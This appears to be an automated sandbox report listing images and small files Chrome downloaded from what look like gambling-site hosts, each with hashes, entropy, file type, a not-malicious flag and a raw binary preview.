                                                                                                                                                          Preview:GIF89aN.Q.......Ql.i..O$eC.)...".[<..4.aC..izNQ.i..W.........)..%...4m1j.3Lv6..G.[C..9B....{......WuJ..k.....CS.Y..r..s.U92jF8vU..%HrJ.....5..K...7tK.r...[...FyS..1x.R.M...S.e...U.......M&..d..h.....W....a..Gj.D..4.....1.5....f..3.U4.....yd.[..W8.f.Y:..v.....h'tW..Z.y.....s..XV{R.`....f....]..mx.C..e..3..u.d.x..i..T.....f..u#kQBmD.....`..j..W..Z.^<.iO..R..F.....g..w..[..J..p........c..v..F..(..i...E..m..`..W..6....e%..z....E..z.8.....V..V..6....y..A..1{]..g.......i._.....Rz.Z..........BE~_..w.bH.Z..+..[.......G....w..H.U4.....%.."................1mP.pT..+..u.......z.t..j.."..(..O.. ..c...}.K..;+nH.................O..[.....!.....8.Q7.....(.. ...z.@'a7..(k.,....Y4..'..M.....<.t..D..0.....O.."..0..*..Q..}..m.....I..m..q.T6.T7.T7............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/cc.png?r=8285707295
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):28
                                                                                                                                                          Entropy (8bit):4.307354922057605
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:WZoS+Nhn:WZoSyh
                                                                                                                                                          MD5:A2432DC721D79CB02E73D270CE7E1EAA
                                                                                                                                                          SHA1:5A3C7BE77E9108ACA1B39E6BCD336EAAE6A51080
                                                                                                                                                          SHA-256:CE43C8C02C05A92B3E20FAB138AAD31B9FD54B92848913449D09924E839BB80E
                                                                                                                                                          SHA-512:0091B8D2F943169BDF1DD01D07A31F683F3B353D4EAADF1F7973AA79A989E349F53D6518AC612A856D89AB1539923C9FFAABB13E7CF8BEDF450E128342FF3298
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnG505OmUYEoxIFDZFhlU4SBQ01hlQc?alt=proto
                                                                                                                                                          Preview:ChIKBw2RYZVOGgAKBw01hlQcGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1203
                                                                                                                                                          Entropy (8bit):7.6423370091541045
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:0q2UxzC7yqsfRY5+zg95emDCzEvk8tHqZRbfZoJ2HPt5gTT4tBOhAMe6:0qboyqsfO5+8MA+EvDpqzfXH7g64eN6
                                                                                                                                                          MD5:375073F4229C808F4EC35542748EBA24
                                                                                                                                                          SHA1:A3442405D67BDBEBA808F0433C0F46CCA4C2E1D6
                                                                                                                                                          SHA-256:9CBBBF9B8DF0CA98E9E236C87E9D456B6B1444E85D0E90DAA060164374ECBAE3
                                                                                                                                                          SHA-512:1D978648E31DEC62E03FEE6EA377AD16288CE6B1A5E2D3828D44A920C6028733E8428B7FC8E1A5BD93584F563763B0AD7B43E8A3540091A7F91DEB55097E2AA4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_yg.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE....!B."C. A.$E."C."C.#D.$D."C.!B.$F."C."D.!C.#D."C.#D.$E."C.%F.#D.!C."C.!B.#D.!B.#C."C.$E.#C.!B.$E.#D."C.!B."C. A.!B.&G.$E./N.%F.!B./N.-L."C.!B.!B.#D.%F.$E.'H.3S$8V.)J.)J.0P.*J.'G...y..Os.M^vHXq*B_.?\+=Z.8Z.;X":X.7X.6W.7V.4R.$R.2Q 2P./N..N.,L.(H...W........e..u..e..Dw.P}.6u.[x.b..az.^|./l.7p.Dn.=r.^v.1e.9j.;o.Gc.Sn.'a.1a}Mc{"Ty*Yx5Yu<ZtAVp2Rp7Pj$If"Cc.Fb*@]&<Z.4S.(O./N.%F......................u..N.....`..|..{..I..g..^..?..r..i..q.....B{.m..F..m..Q|.l..Z..J..<w.7n.t..i|.Lk.)h.Lq.Mq.Bo.@f.+f.Xn.Oj.@`.?a~Ud{1Wz/Wr%Qq>To,So-Sm=Oj$Hd1Gb&Da.Ba.Ba$@]..W..T...0tRNS.........R.....7.z.........~tqk_XMEA?3+.....W++..R.....IDAT(....@.Eg.......Hf;13-333.......".S.V..=....Vu_..I..FT..f1L...3"i.V..Y..%.-....iI...qS$..V.;P.!G..X.M+.S.v'.).(M.-L....&q..=K....}...M-L. ..C:.R$.v...<......yh..H..P.........{.X.YHL...............O..MU.9.kg!$....$J....+.3mu...+u6?....1.Y... 2.t......m..s$.[...n.)@!!..LV...........4...dX... ../v....^......o..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 417 x 175, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123876
                                                                                                                                                          Entropy (8bit):7.993273602263211
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:3072:nwVtVPaekMIKIbW9jDuRST+OrOs7+E+PELXY6zm:nwVtRvZIKRDrNrN7GcLXYt
                                                                                                                                                          MD5:D42810F92F54CE8D2DF03A0559E2AE0E
                                                                                                                                                          SHA1:1A2321D6DDFB2384EAF7CA52311471765A3269CF
                                                                                                                                                          SHA-256:F07A16F834F5B050E3BF6BC8D058ED4E9A934812DB8010AA2689D5CFD11957DB
                                                                                                                                                          SHA-512:96E33EEA38AF95689665287551FB44C3728E6EB057990A96B6234013BDC07488760FA3272A0D49EA0E8C5014E77F7015E29149DC5C2E2F6E20B40C2823B44CA2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............T.a.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:E3798873CDEB11E99AC7D01FD79364F8" xmpMM:DocumentID="xmp.did:E3798874CDEB11E99AC7D01FD79364F8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E3798871CDEB11E99AC7D01FD79364F8" stRef:documentID="xmp.did:E3798872CDEB11E99AC7D01FD79364F8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......TIDATx....]e.6..>..9.g2.d&.B...E@.(."`..A.DP.zU."X..(.^.R$.z.$...{2...9....g..>...y/L2...../3gN}....U..l.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 334 x 81, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13472
                                                                                                                                                          Entropy (8bit):7.969583646222461
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hSHIIHUCD4wajBOMymGZqYREmEA7ULOnQXP2rAd8D68WdeRMC/4aMV4JaLiMTH90:I50wRMduR5R2eJ6WGg4bV4WiM7Aa4
                                                                                                                                                          MD5:C1B662429565930C6FF3BA1B9EFD3371
                                                                                                                                                          SHA1:7406ED629DDF60826982C89782D244B557BC7C26
                                                                                                                                                          SHA-256:ED2450629CB22C9B3184446C3617E98D036D3FAAAB978C42B1023B42CD6F9C64
                                                                                                                                                          SHA-512:EEC443C4D7F0385C0147FF0ACAEC7548A0E6943A2A59933EE7C9F8EFC7E4E3EECE4D1EBFF701443B1730C51FACAA5E12043574F25CC42EF124FA37DD2554FCA5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/d37314d9711f2230688aca13698b9e6f.png
                                                                                                                                                          Preview:.PNG........IHDR...N...Q.....2.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 94 x 106, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8521
                                                                                                                                                          Entropy (8bit):7.969752001872923
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:jjzADoJ7BM/SYBnVNkHoK0erzoUC6uAEmtHdEDRL3itf:jnCoJ9MaYtfk/rtCFpCHC+f
                                                                                                                                                          MD5:8490DFD5BC6C30AA0D8A2AF1F9B7500F
                                                                                                                                                          SHA1:14781D05C17616629083E281B49EE45066426D40
                                                                                                                                                          SHA-256:85181C2483DD31361E49637D31AB0E89339FC3C243A31CF06AA7C39E318F48EF
                                                                                                                                                          SHA-512:98D5DE93412C579714D5023EEE77AB9F9F227E3A371E7FC3A407F3BEC5C2DD3690756F57E2C5B68C0246D2E2CB4A1D750B7131AFE0B7F7416E803CB48122F540
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/app/h5_icon.png.png
                                                                                                                                                          Preview:.PNG........IHDR...^...j.....59.... .IDATx^..x.G.._fe...T.[.C.q....26..G.4X.4......g..=.....`..l.~.m....;.}....m.6.0.}c..U.*I...:T.+3.{...*.*+.XF.....U.....|...Q.|.....p.......|.....=......?..<p......8....<9....(..H.v.w...Gc$...H....@Q...c....oR.9..@S....1..8....GV.EW...../...8.).H6.O.Y.W...P.+..8..P....g.(.8*.<.........A...8.....PQ......(.j.b.8..".P..K..?l......$*..4...&P..6d....n&..4..!.....p....+.A`....Bn..i..#.t..@gf....@qj.j |..h.Q.....|/...<d..`.w.k.Xt..Y....E.^M&.@.%.#....$2#I..P....V..2Cn..:.<7..\....N..JfwkL.4...t?R............i>}..3...n[...d...4..<..J:...}rU....:.f..V....2+.I..?...D.?..^_.b.<...O*i.....Z.G0.....w....B..X.=as.......;G.....t....=}....d.%.4.""..*.l......8.. .d|G..4..D..'v.Ke.IV!^...n..<....F.>w..n...6.../.\.U..+gR..D..A...d2..W.Ol..H..\@...........0.....N...?...k....n..(F....y&.Xa....S...y./......d..uM(.1..c.....2./..?......P/...k.=7.c..{..3.j..FP.<.`.-.Q.S..q...P.!.....^..:.H39t=$(4..wo..+.=`.Oi...\.Pi....J+.x..P7....._
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2442
                                                                                                                                                          Entropy (8bit):7.469194340286183
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuij6eJ3jt7IhrMCsm1cn40wt2GnLh73RiJtqxsTeOzo:2NIG7Ihr31oDwnLRQqxOzo
                                                                                                                                                          MD5:ED097FE6098C539EC482E67E5ACBF451
                                                                                                                                                          SHA1:7BC83D0908219E78AE0FF4811FA5D6935D24184B
                                                                                                                                                          SHA-256:FAA10874B0AF9B5A478AE1775B6B1F0ECA93B76FFB681AF56E98F651D751E803
                                                                                                                                                          SHA-512:588A81A0DAE5BAE607A7EF8B401C60592A516FD65440B2D32BA92244BB84B199528D178F1BA8139B29B9A3BF76434DEBC2CFDCC1A010C9603641AD0818E601C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_bg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:0F9F88E1F77811E7BC26CA443FF92646" xmpMM:InstanceID="xmp.iid:0F9F88E0F77811E7BC26CA443FF92646" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/bbin_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):44327
                                                                                                                                                          Entropy (8bit):7.990407913990885
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:6TvSakVWGFUqCCFf16XFH+GYjCKzjgy0nfBEd9m694QqOvTWFP:699AJl1q2jg7nmdg695q8TWFP
                                                                                                                                                          MD5:147761B969F0C8D4E02032153C1CD966
                                                                                                                                                          SHA1:D85E7FA68051036C2FEEB71AF4E47FFB7647B62A
                                                                                                                                                          SHA-256:390D67C5603C292D02629EA992ABF84B1A927088881669D205D68FFCD34CB131
                                                                                                                                                          SHA-512:825B251E1A1ED65E9F271207FE7345E763EEF58CBBBA3CA2BDF302E675561A70ED83EDCF99A4E787C9E452AB52C8F1DEC08545A1666D3D3F48C77B13A68D6617
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sports/yabo.png
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:55AB19C8CDEB11E99917C5C3A935A3DF" xmpMM:DocumentID="xmp.did:55AB19C9CDEB11E99917C5C3A935A3DF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:55AB19C6CDEB11E99917C5C3A935A3DF" stRef:documentID="xmp.did:55AB19C7CDEB11E99917C5C3A935A3DF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.J......IDATx..}.|\..yuz.4.wc.`......@... .l....m.~...&@.!$.@......&.H.z.h....;...dR6....y3......O..q...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 41 x 59, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5894
                                                                                                                                                          Entropy (8bit):7.960254037121533
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KO5apconyKfkzr+wNiyqplj5xODqSphcMsAmcmM6b2xD9kkFfRIngnqnTmr6elK:KO5qcKdwNRqp3xaeMIcmNbofBnUTmrnQ
                                                                                                                                                          MD5:B41A4FA38E1F497D63CF6242877B13FC
                                                                                                                                                          SHA1:BCD801E9C94C42FC26686671BE650FFF5418A7E9
                                                                                                                                                          SHA-256:334B1936D75711C09E7CDC43A2AFDE0614B8D2522503DF5C44845DECC203489E
                                                                                                                                                          SHA-512:2DDEDB7651794532636BCED004A8A6E639EE6EBF6929260AD195979FE3F56C17E3548BF178E4870774FD6E33148970FC8554555D4B2AAF4290F6251BA1D65666
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/parner/logo_italy.png
                                                                                                                                                          Preview:.PNG........IHDR...)...;......~.f....IDAThC.Z.xU......Ld$H !a&.0..Z.ie0L..:...>.!N..ZM. ..A.'..P%H....P..2..9!..2.;.s...........=.w..s...Zk.._k_... ..(..t.-.P..K.f.7~C.E...2.w..5..<L..............#..'..d...H..y.#1...E...rsG.v.]kll...'..k...dUU..h."q...}...N.....'...9.sX.Vs.hT'....a...DQ.<......]MMM....G&M.....R..(!.;... ...%Y.-...rvvv.I.n....t:.-.K...VI..1.K..yzyN.0`P..8.RU....=|.....s.........F.^o...D..<yU..R.w.^..#..........w.<?X....J........-v.P.Q.4...j.1.1..=.....oX.v...G{... .D....H.....n.:[FFF..3.....a.0.......]..'."'.Y.t.......@x.*.TC.,..9.</.`...p..._~..Q..TVV.srr.W...Hy....k..f.Y.jEQ..&....vn.....mj...8.6(Jl......y(.0.^.o.........Jt...l..._...x.|..W..Z.G...|C..............:..(...._.xa./\.,. ..D"..J...Eb.....:(\)...tA..A .].j:.v.8.Y.r....%.../.-[voQQQSjj.o..Z|.. .'.|..qcZuu......c1...j$.."....7....i0..jp...B.X.R.......^ .#.a.qhiiy.........baaa >.%.l%...$.;..../.......)....A.ab..yI..@B.<4..@.H..0.nk^~qfMv0....}......{Guu...b.......}........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/bbin_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17920
                                                                                                                                                          Entropy (8bit):7.954260425598395
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:6Xhq0luXIA7ppy5ZlQfVOgMGRWjji7v2FDzBKV9NVZuYGVhrfracy6HZyyaVnUgG:6E0WppU5ZlQfVbIa7v2DW6VrfrkyMn1G
                                                                                                                                                          MD5:9BEEFE094C5746596EB886A0F9CE9516
                                                                                                                                                          SHA1:043A5F197A8B4A8CC3B40A3126F1BFB8CBD12ADA
                                                                                                                                                          SHA-256:39A8BDC4F2DB24410A4A0D4180FF953D1AEC6EFDD7DBAC23A37D08C813214151
                                                                                                                                                          SHA-512:1F41A044818844CD6E734291116E0CAE1E5D93A7659823084103CC3ED3D862EDA115E2B44BA8F5809D0CDE91C9BB7EDCAD75403B196A1D5738105CACD2C6A831
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E2893C229C1511E79144CCF7D3AEA9BF" xmpMM:InstanceID="xmp.iid:E2893C219C1511E79144CCF7D3AEA9BF" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1fa39400-0423-3b49-88e9-b820ab33a34b" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):53447
                                                                                                                                                          Entropy (8bit):7.993730777959549
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:1536:E4C99xTuRKJnHFZg8NLdxGtWs+VWSsdeNr5v+ua7R:i99xT88/reWseeepm1
                                                                                                                                                          MD5:37F68C3A2DE0D413C056B2D8B948FF41
                                                                                                                                                          SHA1:3F22311A3EDAD209EB71B88FF2E96A80E25B3503
                                                                                                                                                          SHA-256:EB8345229FFA12B511A012DE3C41B87625585B46DFA9CF69EC359D8D7845E355
                                                                                                                                                          SHA-512:FCB4614B153E84BFCF12214AF2FB1CAD1EF444A49B1899C2F2BCE2538824040CFB52B48E06FA7262139CC969C013271777FDE07BC009622203624BE95DA54555
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
